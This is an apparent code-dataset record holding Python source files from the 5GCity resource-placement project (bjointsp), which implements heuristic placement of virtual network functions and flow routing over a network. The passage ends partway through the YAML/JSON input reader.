metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "5GCity/5GCity-resource-placement",
"score": 2
} |
#### File: bjointsp/heuristic/control.py
```python
import math
import time
import logging
import bjointsp.objective as objective
from collections import defaultdict
from bjointsp.heuristic import heuristic
from bjointsp.heuristic import improvement
from bjointsp.heuristic import shortest_paths as sp
from bjointsp.overlay.instance import Instance
# global variables for easy access by all functions
nodes, links, prev_instances, obj = None, None, None, None
# return dict of currently consumed node resources based on the instances of the specified overlays
def consumed_node_resources(overlays):
consumed_cpu, consumed_mem = {}, {}
# reused instances exist in multiple overlays with diff ingoing edges -> have to allow duplicates -> use list not set
instances = [i for t in overlays.keys() for i in overlays[t].instances]
for v in nodes.ids:
consumed_cpu[v] = sum(i.consumed_cpu() for i in instances if i.location == v)
consumed_mem[v] = sum(i.consumed_mem() for i in instances if i.location == v)
return consumed_cpu, consumed_mem
# return the objective value based on the specified overlays
def objective_value(overlays, print_info=False):
# check delay of each edge; if too high, return math.inf for infeasible/infinity
edges = [e for ol in overlays.values() for e in ol.edges]
for e in edges:
for path in e.paths:
if sp.path_delay(links, path) > e.arc.max_delay:
print("Embedding INFEASIBLE because delay of path of {} is too high".format(e))
logging.warning("Embedding INFEASIBLE because delay of path of {} is too high".format(e))
return math.inf
# calculate changed instances (compared to previous instances)
curr_instances = {i for ol in overlays.values() for i in ol.instances}
changed = prev_instances ^ curr_instances # instances that are were added or removed
# record max over-subscription of node capacities
consumed_cpu, consumed_mem = consumed_node_resources(overlays)
max_cpu_over, max_mem_over = 0, 0
for v in nodes.ids:
if consumed_cpu[v] - nodes.cpu[v] > max_cpu_over:
max_cpu_over = consumed_cpu[v] - nodes.cpu[v]
if consumed_mem[v] - nodes.mem[v] > max_mem_over:
max_mem_over = consumed_mem[v] - nodes.mem[v]
# calculate data rate of each link and mark used links for each edge
consumed_dr = defaultdict(int) # default = 0
link_used = {}
edges = [e for ol in overlays.values() for e in ol.edges]
for e in edges:
for path in e.paths:
# go along nodes of the path and increment data rate of each traversed link
for i in range(len(path) - 1):
# skip connections on same node without a link (both inst at same node)
if path[i] != path[i + 1]:
# assume the edge dr is split equally among all paths (currently only 1 path per edge)
consumed_dr[(path[i], path[i+1])] += e.flow_dr() / len(e.paths)
link_used[(e.arc, e.source.location, e.dest.location, path[i], path[i+1])] = 1
# record max over-subscription of link capacitiy
max_dr_over = 0
for l in links.ids:
if consumed_dr[l] - links.dr[l] > max_dr_over:
max_dr_over = consumed_dr[l] - links.dr[l]
# calculate total delay over all used links (by different edges)
total_delay = 0
for key in link_used:
total_delay += links.delay[(key[3], key[4])]
# calculate total vnf delay of each node and add it to total_delay
vnf_delays = 0
for i in curr_instances:
vnf_delays += i.component.vnf_delay
# adding vnf_delay to total_delay
total_delay += vnf_delays
# calculate total consumed resources
total_consumed_cpu = sum(consumed_cpu[v] for v in nodes.ids)
total_consumed_mem = sum(consumed_mem[v] for v in nodes.ids)
total_consumed_dr = sum(consumed_dr[l] for l in links.ids)
# print objective value info
if print_info:
print("Max over-subscription: {} (cpu), {} (mem), {} (dr)".format(max_cpu_over, max_mem_over, max_dr_over))
print("Total delay: {}, Num changed instances: {}".format(total_delay, len(changed)))
print("Total consumed resources: {} (cpu), {} (mem), {} (dr)".format(total_consumed_cpu, total_consumed_mem, total_consumed_dr))
logging.info("Max over-subscription: {} (cpu), {} (mem), {} (dr)".format(max_cpu_over, max_mem_over, max_dr_over))
logging.info("Total delay: {}, Num changed instances: {}".format(total_delay, len(changed)))
logging.info("Total consumed resources: {} (cpu), {} (mem), {} (dr)".format(total_consumed_cpu, total_consumed_mem, total_consumed_dr))
# calculate objective value; objectives & weights have to be identical to the MIP
# lexicographical combination of all objectives
if obj == objective.COMBINED:
w1 = 100 * 1000 * 1000 # assuming changed instances < 100
w2 = 1000 * 1000 # assuming total resource consumption < 1000
w3 = 1000 # assuming total delay < 1000
value = w1 * (max_cpu_over + max_mem_over + max_dr_over)
value += w2 * len(changed)
value += w3 * (total_consumed_cpu + total_consumed_mem + total_consumed_dr)
value += total_delay
# minimize max over-subscription
elif obj == objective.OVER_SUB:
value = max_cpu_over + max_mem_over + max_dr_over
# minimize changed instances (compared to previous embedding)
elif obj == objective.CHANGED:
value = len(changed)
# minimize total resource consumption
elif obj == objective.RESOURCES:
value = total_consumed_cpu + total_consumed_mem + total_consumed_dr
# minimize total delay
elif obj == objective.DELAY:
value = total_delay
else:
logging.error("Objective {} unknown".format(obj))
raise ValueError("Objective {} unknown".format(obj))
return value
# return a dict with the total source data rate for each source component
def total_source_drs(sources):
src_drs = defaultdict(int) # default = 0
for src in sources:
src_drs[src.component] += src.dr
return src_drs
def solve(arg_nodes, arg_links, templates, prev_overlays, sources, fixed, arg_obj):
# write global variables
global nodes, links, prev_instances, obj
nodes = arg_nodes
links = arg_links
# copy previous instances (attributes like edges_in etc are not needed and not copied)
prev_instances = {Instance(i.component, i.location, i.src_flows) for ol in prev_overlays.values() for i in ol.instances}
obj = arg_obj
# print input
print("Templates:", *templates, sep=" ")
print("Sources:", *sources, sep=" ")
print("Fixed instances:", *fixed, sep=" ")
print("Previous instances:", *prev_instances, sep=" ")
# pre-computation of shortest paths
start_init = time.time()
shortest_paths = sp.all_pairs_shortest_paths(nodes, links)
init_time = time.time() - start_init
print("Time for pre-computation of shortest paths: {}s\n".format(init_time))
logging.info("Time for pre-computation of shortest paths: {}s\n".format(init_time))
start_heuristic = time.time()
# get total source data rate for each source component (for sorting the templates later)
src_drs = defaultdict(int) # default = 0
for src in sources:
src_drs[src.component] += src.total_flow_dr()
# sort templates with decreasing weight: heaviest/most difficult templates get embedded first
templates.sort(key=lambda t: t.weight(src_drs[t.source()]), reverse=True)
print("Templates sorted to start with heaviest:", *templates, sep=" ")
# initial solution
#print("\n----- Initial solution -----")
logging.info("----- Initial solution -----")
overlays = heuristic.solve(arg_nodes, arg_links, templates, prev_overlays, sources, fixed, shortest_paths)
obj_value = objective_value(overlays)
#print("Objective value of initial solution: {}".format(obj_value))
#print("Runtime for initial solution: {}".format(time.time() - start_heuristic))
logging.info("Objective value of initial solution: {}".format(obj_value))
logging.info("Runtime for initial solution: {}\n".format(time.time() - start_heuristic))
# iterative improvement
if len(nodes.ids) > 1: # doesn't work for networks with just 1 node
#print("\n----- Iterative improvement -----")
logging.info("----- Iterative improvement -----")
overlays = improvement.improve(arg_nodes, arg_links, templates, overlays, sources, fixed, shortest_paths)
obj_value = objective_value(overlays)
runtime = time.time() - start_heuristic
#print("Objective value after improvement: {}".format(obj_value))
#print("Heuristic runtime: {}s".format(runtime))
logging.info("Objective value after improvement: {}".format(obj_value))
logging.info("Heuristic runtime: {}s".format(runtime))
else:
runtime = time.time() - start_heuristic
#print("Skip iterative improvement for network with just 1 node")
logging.info("Skip iterative improvement for network with just 1 node")
# calculate changed instances for writing result
curr_instances = {i for ol in overlays.values() for i in ol.instances}
changed = prev_instances ^ curr_instances # instances that were added or removed
return init_time, runtime, obj_value, changed, overlays
```
#### File: bjointsp/heuristic/heuristic.py
```python
import math
import logging
import random
from collections import OrderedDict # for deterministic behavior
from bjointsp.overlay.edge import Edge
from bjointsp.overlay.instance import Instance
from bjointsp.overlay.overlay import Overlay
# global variables for easy access by all functions
nodes, links, shortest_paths, overlays = None, None, None, None
# return the outgoing arc of the specified component at the specified output in the specified direction
def out_arc(template, component, output, direction):
out_arcs = [a for a in template.arcs if a.starts_at(direction, output, component)]
# there has to be exactly one arc per input and output; but the arc might belong to another template
if len(out_arcs) == 1:
return out_arcs[0]
elif len(out_arcs) == 0:
return None
else:
raise ValueError("#outgoing arcs of {} at {} output {} is {}. It should be at most 1 per output and template."
.format(component, direction, output, len(out_arcs)))
# remove the specified instance and its in- and outgoing edges from all overlays/specified overlay
# if the instance is stateful, also remove it from passed_stateful of all flows
def remove_instance(instance, overlay=None):
# if an overlay is specified, only remove from that overlay; else from all
if overlay is not None:
overlays_to_update = [overlay]
else:
overlays_to_update = overlays.values()
# remove instance and associated edges from overlays_to_update and update flows
for ol in overlays_to_update:
flows_to_update = [f for e in ol.edges for f in e.flows if instance in f.passed_stateful.values()]
for f in flows_to_update:
f.passed_stateful = {k:v for k, v in f.passed_stateful.items() if v != instance}
if instance in ol.instances:
ol.instances = [i for i in ol.instances if i != instance]
#print("\tRemoved instance {} from overlay of {}".format(instance, ol.template))
logging.info("\tRemoved instance {} from overlay of {}".format(instance, ol.template))
edges_to_remove = [e for e in ol.edges if e.source == instance or e.dest == instance]
for e in edges_to_remove:
remove_edge(e, overlay)
# remove the specified edge from all overlays/specified overlay and instances
def remove_edge(edge, overlay=None):
# remove mapped dr
for f in edge.flows:
del f.dr[edge]
# remove edge from specified overlay or from all (if none is specified) and update flows
for ol in overlays.values():
if ol == overlay or overlay is None:
if edge in ol.edges:
ol.edges.remove(edge)
for i in ol.instances:
i.edges_in = {key: e for key, e in i.edges_in.items() if e != edge}
i.edges_out = {key: e for key, e in i.edges_out.items() if e != edge}
#print("\tRemoved edge {}".format(edge))
logging.info("\tRemoved edge {}".format(edge))
# remove specified flow: remove mapping from/to edges, remove edges that are now "empty" (without mapped flows)
def remove_flow(overlay, flow):
#print("Removing outdated flow {} and corresponding edges (without other flows)".format(flow))
logging.info("Removing outdated flow {} and corresponding edges (without other flows)".format(flow))
for e in list(overlay.edges): # iterate over copy as edges are removed during loop
# remove mappings
if flow in e.flows:
e.flows.remove(flow)
del flow.dr[e]
# remove empty edges
if not e.flows:
remove_edge(e, overlay)
# return dict of currently consumed node resources
# ignore the idle cpu/mem consumption of the instances of component specified in ignore_idle
def consumed_node_resources(ignore_idle=None):
consumed_cpu, consumed_mem = {}, {}
# reused instances exist in multiple overlays with diff ingoing edges -> have to allow duplicates (use list)
instances = [i for t in overlays.keys() for i in overlays[t].instances]
for v in nodes.ids:
consumed_cpu[v] = sum(i.consumed_cpu(ignore_idle) for i in instances if i.location == v)
consumed_mem[v] = sum(i.consumed_mem(ignore_idle) for i in instances if i.location == v)
return consumed_cpu, consumed_mem
# return dict of nodes with enough remaining node resources (based on delta_dr and the components requirements)
# ignoring nodes that are too far away, i.e., with a too high delay, and that are on the tabu list
# keys: nodes, values: (remaining cpu, remaining mem)
def candidate_nodes(start_node, arc, delta_dr, tabu=set()):
# increase ingoing dr: delta_dr at corresponding input, 0 elsewhere
delta_in_dr = []
for i in range(arc.dest.inputs + arc.dest.inputs_back):
if arc.direction == "forward" and i == arc.dest_in:
delta_in_dr.append(delta_dr)
elif arc.direction == "backward" and i == arc.dest.inputs + arc.dest_in:
delta_in_dr.append(delta_dr)
else:
delta_in_dr.append(0)
# get currently consumed node resources without idle consumption of dest-instances (to avoid subtracting it twice)
consumed_cpu, consumed_mem = consumed_node_resources(arc.dest)
# only consider nodes that are close enough (short delay) and that are not on the tabu list for the component
allowed_nodes = [v for v in nodes.ids if shortest_paths[(start_node, v)][2] <= arc.max_delay and (arc.dest, v) not in tabu]
# check each node and add it if it has any of the required resources remaining
candidates = OrderedDict()
for v in allowed_nodes:
remaining_cpu = nodes.cpu[v] - consumed_cpu[v]
remaining_mem = nodes.mem[v] - consumed_mem[v]
if remaining_cpu - arc.dest.cpu_req(delta_in_dr) >= 0 and remaining_mem - arc.dest.mem_req(delta_in_dr) >= 0:
candidates[v] = (remaining_cpu, remaining_mem)
return candidates
# return the best node to create an edge to (from a given location, along a given arc, excluding the tabu-instance)
# FUTURE WORK: favor nodes with suitable instances -> encourage reuse of existing instances -> better objective 2
def find_best_node(overlay, start_location, arc, delta_dr, fixed, tabu):
# candidate nodes with enough remaining node capacity
candidates = candidate_nodes(start_location, arc, delta_dr, tabu)
#print("\tCandidate nodes for component {}:".format(arc.dest))
logging.debug("\tCandidate nodes for component {}:".format(arc.dest))
for v in candidates.keys():
#print("\t\t{} with {}".format(v, candidates[v]))
logging.debug("\t\t{} with {}".format(v, candidates[v]))
# fixed instances need special treatment: cannot be added or removed => enforce reuse
if fixed:
#print("Component {} has fixed instances, which have to be used (no new instances allowed)".format(arc.dest))
logging.info("Component {} has fixed instances, which have to be used (no new instances allowed)".format(arc.dest))
fixed_nodes = [i.location for i in overlay.instances if i.component == arc.dest and
shortest_paths[(start_location, i.location)][2] <= arc.max_delay]
candidates = {node: resources for node, resources in candidates.items() if node in fixed_nodes}
# check all candidate nodes and place instance at node with lowest resulting path-weight (high dr, low delay)
if len(candidates) > 0:
path_weight = OrderedDict()
for v in candidates.keys():
path_weight[v] = shortest_paths[(start_location, v)][1]
best_node = min(path_weight, key=path_weight.get)
# if no nodes have remaining capacity, choose node with lowest over-subscription (within delay bounds)
else:
#print("No nodes with enough remaining resources. Choosing node with lowest over-subscription.")
logging.info("No nodes enough remaining resources. Choosing node with lowest over-subscription.")
consumed_cpu, consumed_mem = consumed_node_resources()
best_node = None
min_over_subscription = math.inf
min_path_weight = math.inf # path weight of current best node, use as tie breaker
# only allow nodes that are close enough, i.e., with low enough delay, and that are not tabu
allowed_nodes = [v for v in nodes.ids if shortest_paths[(start_location, v)][2] <= arc.max_delay
and (arc.dest, v) not in tabu]
# if fixed, only allow nodes of fixed instances => enforce reuse
if fixed:
allowed_nodes = fixed_nodes
for v in allowed_nodes:
# looking at sum of cpu and memory over-subscription to find nodes with little over-sub of both
over_subscription = (consumed_cpu[v] - nodes.cpu[v]) + (consumed_mem[v] - nodes.mem[v])
if over_subscription <= min_over_subscription:
path_weight = shortest_paths[(start_location, v)][1]
if over_subscription < min_over_subscription or path_weight < min_path_weight:
best_node = v
min_over_subscription = over_subscription
min_path_weight = path_weight
return best_node
# map the specified flow (with specified flow_dr) to a possibly new edge from the start_instance
def map_flow2edge(overlay, start_instance, arc, flow, flow_dr, tabu):
# determine if the instances of the destination component are fixed => if so, cannot place new instances
fixed = False
for i in overlay.instances:
if i.component == arc.dest and i.fixed:
fixed = True
break
best_node = find_best_node(overlay, start_instance.location, arc, flow_dr, fixed, tabu)
# if the instance at best node already exists (e.g., from forward dir), just connect to it, else create anew
# look for existing instance
instance_exists = False
for i in overlay.instances:
if i.component == arc.dest and i.location == best_node:
instance_exists = True
dest_instance = i
break
# create new instance if none exists in the overlay
if not instance_exists:
dest_instance = Instance(arc.dest, best_node)
overlay.instances.append(dest_instance)
#print("\tAdded new instance {} at best node {} (may exist in other overlays)".format(dest_instance, best_node))
logging.info("\tAdded new instance {} at best node {} (may exist in other overlays)".format(dest_instance, best_node))
# check if edge to dest_instance already exists
edge_exists = False
if instance_exists:
if dest_instance in start_instance.edges_out.keys():
edge_exists = True
edge = start_instance.edges_out[dest_instance]
# if it doesn't exist, create a new edge and assign a path (shortest path)
if not edge_exists:
edge = Edge(arc, start_instance, dest_instance)
overlay.edges.append(edge)
edge.paths.append(shortest_paths[(start_instance.location, dest_instance.location)][0])
# map flow to edge
flow.dr[edge] = flow_dr
edge.flows.append(flow)
#print("\tMapped flow {} (dr {}) to edge {} (new: {})".format(flow, flow_dr, edge, not edge_exists))
logging.info("\tMapped flow {} (dr {}) to edge {} (new: {})".format(flow, flow_dr, edge, not edge_exists))
# map out_flows to edges back to the same stateful instances that were passed in fwd direction
def map_flows2stateful(overlay, start_instance, arc, out_flows):
# remove any existing mappings of flows to edges along the arc
for e in start_instance.edges_out.values():
if e.arc == arc:
e.flows = []
# add currently outgoing flows to edges back to stateful instances (create edges if necessary)
for f in out_flows:
dest_inst = f.passed_stateful[arc.dest]
if dest_inst in start_instance.edges_out.keys():
new_edge = False
edge = start_instance.edges_out[dest_inst]
else:
new_edge = True
edge = Edge(arc, start_instance, dest_inst)
edge.paths.append(shortest_paths[(start_instance.location, dest_inst.location)][0])
overlay.edges.append(edge)
f.dr[edge] = out_flows[f]
edge.flows.append(f)
#print("\tMapped flow {} (dr {}) to edge {} (new: {}) back to same stateful instance".format(f, out_flows[f], edge, new_edge))
logging.info("\tMapped flow {} (dr {}) to edge {} (new: {}) back to same stateful instance".format(f, out_flows[f], edge, new_edge))
# update the mapping of flows leaving the start_instances along the specified edge
def update_flow_mapping(overlay, start_instance, arc, out_flows, tabu):
flow_mapping = {f: e for e in start_instance.edges_out.values() if e.arc == arc for f in e.flows}
# remove outdated flows
for f in list(flow_mapping.keys()):
if f not in out_flows:
del f.dr[flow_mapping[f]]
flow_mapping[f].flows.remove(f)
del flow_mapping[f]
#print("\tRemoved outdated flow {} along {}".format(f, arc))
# enforce return of flows to the same stateful instances as passed in fwd direction
if arc.dest.stateful and arc.direction == "backward":
map_flows2stateful(overlay, start_instance, arc, out_flows)
# update dr of mapped flows and map new ones
else:
# sort flows for determinism and reproducibility (same results with same key)
ordered_flows = [f for f in sorted(out_flows, key=lambda flow: flow.id)]
# shuffle order to achieve different order of mapping in different iterations; maintains determinism and reproducibility (due to same key)
random.shuffle(ordered_flows)
for f in ordered_flows: # sort according to flow.id to ensure determinism
if f in flow_mapping:
f.dr[flow_mapping[f]] = out_flows[f] # update data rate
#print("\tUpdated dr of existing flow {} (Now: {})".format(f, f.dr[flow_mapping[f]]))
# FUTURE WORK: maybe check if capacitiy violated => if yes, reassign flow to different edge; but might also be fixed during iterative improvement
else:
map_flow2edge(overlay, start_instance, arc, f, out_flows[f], tabu)
# FUTURE WORK: maybe try to minimize number of edges or number of new edges by combining flows to one edge or preferring existing edges (opj 2)
# remove empty edges
for e in start_instance.edges_out.values():
if e.arc == arc and not e.flows:
#print("\nRemoved empty edge {}".format(e))
logging.info("\nRemoved empty edge {}".format(e))
remove_edge(e, overlay)
# update sources (add, rem), update source flows, reset passed_stateful of all flows
def update_sources(overlay, sources):
# reset passed_stateful for all flows (set up to date later) and remove outdated flows
#print("Reset passed_stateful for all flows of template {}".format(overlay.template))
src_flows = {f for src in sources for f in src.flows}
mapped_flows = {f for e in overlay.edges for f in e.flows} | {f for src in sources for f in src.flows}
for f in mapped_flows:
f.passed_stateful.clear()
if f not in src_flows:
remove_flow(overlay, f)
# add/update source instances
for src in sources:
# get existing source instance at the location
src_exists = False
for i in overlay.instances:
if i.component == src.component and i.location == src.location:
src_exists = True
break
# update or add source instance depending on whether such an instance already exists or not
if src_exists:
# remove outdated flows
for f in i.src_flows:
if f not in src.flows:
i.src_flows.remove(f)
for e in f.dr:
e.flows.remove(f)
f.dr.clear()
f.passed_stateful.clear()
# update or add new flows
for f in src.flows:
# if the flow already exists, keep the existing flow and only update its src_dr
if f in i.src_flows:
new_src_dr = f.src_dr
f = i.src_flows[i.src_flows.index(f)] # get existing flow object in i.src_flows
f.src_dr = new_src_dr
# else add the new flow
else:
i.src_flows.append(f)
f.passed_stateful[i.component] = i
#print("Updated/checked src_flows of existing source instance {}".format(i))
logging.info("Updated/checked src_flows of existing source instance {}".format(i))
else:
src_instance = Instance(src.component, src.location, src.flows)
overlay.instances.append(src_instance)
#print("Added new source instance {}".format(src_instance))
logging.info("Added new source instance {}".format(src_instance))
# remove old source instances without source
source_instances = [i for i in overlay.instances if i.component.source]
for src in source_instances:
corresponding_sources = {s for s in sources if s.component == src.component and s.location == src.location}
if len(corresponding_sources) == 0:
#print("Remove source instance {} without corresponding source".format(src))
logging.info("Remove source instance {} without corresponding source".format(src))
remove_instance(src)
# create an initial solution for the provided input
def solve(arg_nodes, arg_links, templates, prev_overlays, sources, fixed, arg_shortest_paths, tabu=set()):
# print("Previous overlays:")
# for ol in prev_overlays.values():
# ol.print()
# tabu_string = ""
# for i in tabu:
# tabu_string += "({},{}) ".format(i[0], i[1])
# print("Tabu list: {}".format(tabu_string))
# write global variables
global nodes, links, shortest_paths, overlays
nodes = arg_nodes
links = arg_links
shortest_paths = arg_shortest_paths
# keep previous overlays of templates that still exist
overlays = {t: ol for t, ol in prev_overlays.items() if t in templates}
# create empty overlays for new templates
for t in templates:
if t not in overlays.keys():
overlays[t] = Overlay(t, [], [])
#print("Created empty overlay for new template {}".format(t))
logging.info("Created empty overlay for new template {}".format(t))
# remove all instances of fixed components => curr fixed instances added again later; prev fixed instances removed
fixed_components = {f.component for f in fixed}
fixed_instances = {i for ol in overlays.values() for i in ol.instances if i.component in fixed_components}
#print("Remove any existing fixed instances:", *fixed_instances, sep=" ")
for i in fixed_instances:
remove_instance(i)
# embed templates sequentially in given order
for t in templates:
#print("\n-Embedding template: {}-".format(t))
logging.info("-Embedding template: {}-".format(t))
own_sources = [src for src in sources if src.component in t.components]
update_sources(overlays[t], own_sources)
# add fixed instances that match template t's components
for f in fixed:
if f.component in t.components:
fixed_instance = Instance(f.component, f.location, fixed=True)
if fixed_instance not in overlays[t].instances:
overlays[t].instances.append(fixed_instance)
#print("Added fixed instance of {} at {}".format(f.component, f.location))
logging.info("Added fixed instance of {} at {}".format(f.component, f.location))
# iterate over all instances in topological order; start in forward direction then switch to backward
i = 0
direction = "forward"
while i < len(overlays[t].topological_order()):
instance = overlays[t].topological_order()[i]
# #print("Topological order:", *overlays[t].topological_order(), sep=" ")
# remove unused instances (except fixed instances)
if not instance.fixed:
if not instance.used(direction, overlays[t]):
#print("Removed unused instance {} from overlay of {}".format(instance, t))
logging.info("Removed unused instance {} from overlay of {}".format(instance, t))
remove_instance(instance, overlays[t])
continue
# switch direction at the first instance of an end component (bc outgoing not ingoing direction considered)
if instance.component.end:
direction = "backward"
# get outgoing flows (and their dr) for each output
out_flows = instance.out_flows(direction)
for k in range(len(out_flows)):
arc = out_arc(t, instance.component, k, direction)
# when a component is adapted for reuse, it has separate outputs for the arcs of different templates
if arc is None: # for output k, this template has no arc => skip to next output
#print("{}'s outgoing arc at output {} in {} direction belongs to a different template. The output is skipped".format(instance, k, direction))
logging.debug("{}'s outgoing arc at output {} in {} direction belongs to a different template. The output is skipped".format(instance, k, direction))
continue
update_flow_mapping(overlays[t], instance, arc, out_flows[k], tabu)
#print("Updated the flow mapping along arc {} at {}\n".format(arc, instance))
logging.info("Updated the flow mapping along arc {} at {}\n".format(arc, instance))
i += 1
#print()
if overlays[t].empty():
del overlays[t]
#print("Deleted empty overlay of {}".format(t))
logging.info("Deleted empty overlay of {}".format(t))
# else:
#overlays[t].print()
#print("Topological order:", *overlays[t].topological_order(), sep=" ")
#print()
return overlays
```
#### File: bjointsp/network/nodes.py
```python
class Nodes:
def __init__(self, ids, cpu, mem):
self.ids = ids
self.cpu = cpu
self.mem = mem
```
#### File: bjointsp/read_write/reader.py
```python
import networkx as nx
import yaml
import numpy as np
from geopy.distance import vincenty
from bjointsp.fixed.fixed_instance import FixedInstance
from bjointsp.fixed.source import Source
from bjointsp.network.links import Links
from bjointsp.network.nodes import Nodes
from bjointsp.overlay.flow import Flow
from bjointsp.template.arc import Arc
from bjointsp.template.component import Component
from bjointsp.template.template import Template
from bjointsp.overlay.overlay import Overlay
from bjointsp.overlay.instance import Instance
from bjointsp.overlay.edge import Edge
import logging
from networkx.readwrite import json_graph
# remove empty values (from multiple delimiters in a row)
def remove_empty_values(line):
result = []
for i in range(len(line)):
if line[i] != "":
result.append(line[i])
return result
# check all stateful components, set non-bidirectional components to non-stateful (required for constraints)
def update_stateful(template):
for j in template.components:
if j.stateful:
used_forward = False
used_backward = False
for a in template.arcs:
if a.direction == "forward" and a.source == j:
used_forward = True # 1+ outgoing arc at j in forward direction
if a.direction == "backward" and a.dest == j:
used_backward = True # 1+ incoming arc at j in backward direction
# if not used in both directions, set to non-stateful
if not (used_forward and used_backward):
print("Stateful component {} is not used bidirectionally and is set to non-stateful.".format(j))
j.stateful = False
# read substrate network from graphml-file using NetworkX, set specified node and link capacities
# IMPORTANT: for consistency with emulator, all node IDs are prefixed with "pop" and have to be referenced as such (eg, in source locations)
def read_network(file, cpu, mem, dr):
SPEED_OF_LIGHT = 299792458 # meter per second
PROPAGATION_FACTOR = 0.77 # https://en.wikipedia.org/wiki/Propagation_delay
# if not file.endswith(".graphml"):
# raise ValueError("{} is not a GraphML file".format(file))
# network = nx.read_graphml(file, node_type=int)
network = json_graph.node_link_graph(file)
# set nodes
node_ids = ["pop{}".format(n) for n in network.nodes] # add "pop" to node index (eg, 1 --> pop1)
# if specified, use the provided uniform node capacities
if cpu is not None and mem is not None:
node_cpu = {"pop{}".format(n): cpu for n in network.nodes}
node_mem = {"pop{}".format(n): mem for n in network.nodes}
# else try to read them from the the node attributes (ie, graphml)
else:
cpu = nx.get_node_attributes(network, 'cpu')
mem = nx.get_node_attributes(network, 'mem')
try:
node_cpu = {"pop{}".format(n): cpu[n] for n in network.nodes}
node_mem = {"pop{}".format(n): mem[n] for n in network.nodes}
except KeyError:
raise ValueError("No CPU or mem. specified for {} (as cmd argument or in graphml)".format(file))
# set links
link_ids = [("pop{}".format(e[0]), "pop{}".format(e[1])) for e in network.edges]
if dr is not None:
link_dr = {("pop{}".format(e[0]), "pop{}".format(e[1])): dr for e in network.edges}
else:
dr = nx.get_edge_attributes(network, 'dr')
try:
link_dr = {("pop{}".format(e[0]), "pop{}".format(e[1])): dr[e] for e in network.edges}
except KeyError:
raise ValueError("No link data rate specified for {} (as cmd argument or in graphml)".format(file))
# calculate link delay based on geo positions of nodes; duplicate links for bidirectionality
link_delay = {}
for e in network.edges:
n1 = network.nodes(data=True)[e[0]]
n2 = network.nodes(data=True)[e[1]]
n1_lat, n1_long = n1.get("Latitude"), n1.get("Longitude")
n2_lat, n2_long = n2.get("Latitude"), n2.get("Longitude")
distance = vincenty((n1_lat, n1_long), (n2_lat, n2_long)).meters # in meters
delay = (distance / SPEED_OF_LIGHT * 1000) * PROPAGATION_FACTOR # in milliseconds
# round delay to int using np.around for consistency with emulator
link_delay[("pop{}".format(e[0]), "pop{}".format(e[1]))] = int(np.around(delay))
# add reversed links for bidirectionality
for e in network.edges:
e = ("pop{}".format(e[0]),"pop{}".format(e[1]))
e_reversed = (e[1], e[0])
link_ids.append(e_reversed)
link_dr[e_reversed] = link_dr[e]
link_delay[e_reversed] = link_delay[e]
nodes = Nodes(node_ids, node_cpu, node_mem)
links = Links(link_ids, link_dr, link_delay)
return nodes, links
# read template from yaml file
def read_template(template, return_src_components=False):
components, arcs = [], []
# with open(file, "r") as template_file:
# template = yaml.load(template_file)
for vnf in template["vnfs"]:
inputs = (vnf["inputs_fwd"], vnf["inputs_bwd"])
outputs = (vnf["outputs_fwd"], vnf["outputs_bwd"])
outgoing = (vnf["out_fwd"], vnf["out_bwd"])
# Try to retrieve the image if it's in the template
vnf_image = vnf.get("image", None)
# Getting the VNF delay from YAML, checking to see if key exists, otherwise set default 0
vnf_delay = vnf.get("vnf_delay", 0)
# Check whether vnf is source and has cpu and mem requirements.
if (vnf["type"] == "source") and ((len(vnf["cpu"]) == 1 and (vnf["cpu"][0] > 0)) or (len(vnf["mem"]) == 1 and (vnf["mem"][0] > 0))):
logging.info("\tSource component {} has CPU:{} and MEM:{} requirements. Check the template file".format(vnf['name'], vnf['cpu'], vnf['mem']))
print ("Source component {} has CPU:{} and MEM:{} requirements. Check the template file".format(vnf['name'], vnf['cpu'], vnf['mem']))
component = Component(vnf["name"], vnf["type"], vnf["stateful"], inputs, outputs, vnf["cpu"], vnf["mem"], outgoing, vnf_delay, config=vnf_image)
components.append(component)
for arc in template["vlinks"]:
source = list(filter(lambda x: x.name == arc["src"], components))[0] # get component with specified name
dest = list(filter(lambda x: x.name == arc["dest"], components))[0]
arc = Arc(arc["direction"], source, arc["src_output"], dest, arc["dest_input"], arc["max_delay"])
arcs.append(arc)
template = Template(template["name"], components, arcs)
update_stateful(template)
if return_src_components:
source_components = {j for j in components if j.source}
return template, source_components
return template
# read sources from yaml file
def read_sources(yaml_file, source_components):
sources = []
# with open(file, "r") as sources_file:
# yaml_file = yaml.load(sources_file)
#
# # special case: no sources
# if yaml_file is None:
# return sources
for src in yaml_file:
# get the component with the specified name: first (and only) element with source name
try:
component = list(filter(lambda x: x.name == src["vnf"], source_components))[0]
if not component.source:
raise ValueError("Component {} is not a source component (required).".format(component))
except IndexError:
raise ValueError("Component {} of source unknown (not used in any template).".format(src["vnf"]))
# read flows
flows = []
for f in src["flows"]:
flows.append(Flow(f["id"], f["data_rate"])) # explicit float cast necessary for dr?
sources.append(Source(src["node"], component, flows))
return sources
# read fixed instances from yaml file
def read_fixed_instances(file, components):
fixed_instances = []
with open(file, "r") as stream:
fixed = yaml.load(stream)
for i in fixed:
# get the component with the specified name: first (and only) element with component name
try:
component = list(filter(lambda x: x.name == i["vnf"], components))[0]
if component.source:
raise ValueError("Component {} is a source component (forbidden).".format(component))
except IndexError:
raise ValueError("Component {} of fixed instance unknown (not used in any template).".format(i["vnf"]))
fixed_instances.append(FixedInstance(i["node"], component))
return fixed_instances
# read previous embedding from yaml file
def read_prev_embedding(file, templates):
# create empty overlays for all templates
prev_embedding = {} # dict: template -> overlay
for t in templates:
prev_embedding[t] = Overlay(t, [], [])
with open(file, "r") as f:
yaml_file = yaml.load(f)
# read and create VNF instances of previous embedding
for vnf in yaml_file["placement"]["vnfs"]:
# find component that matches the VNF name (in any of the templates)
for t in templates:
# use first matching component (assuming it's only in one template)
if vnf["name"] in [c.name for c in t.components]:
component = list(filter(lambda x: x.name == vnf["name"], t.components))[0]
# add new instance to overlay of corresponding template (source components need src_flows being set)
if component.source:
prev_embedding[t].instances.append(Instance(component, vnf["node"], src_flows=[]))
else:
prev_embedding[t].instances.append(Instance(component, vnf["node"]))
break
# TODO: read and create flows. otherwise, adding edges really doesn't make a difference in the heuristic
# read and create edges of previous embedding
for edge in yaml_file["placement"]["vlinks"]:
instances = [i for ol in prev_embedding.values() for i in ol.instances]
# try to get source and dest instance from list of instances
try:
source = list(filter(lambda x: x.component.name == edge["src_vnf"] and x.location == edge["src_node"], instances))[0]
dest = list(filter(lambda x: x.component.name == edge["dest_vnf"] and x.location == edge["dest_node"], instances))[0]
# if the vnfs don't exist in prev_embedding (eg, through incorrect input), ignore the edge
except IndexError:
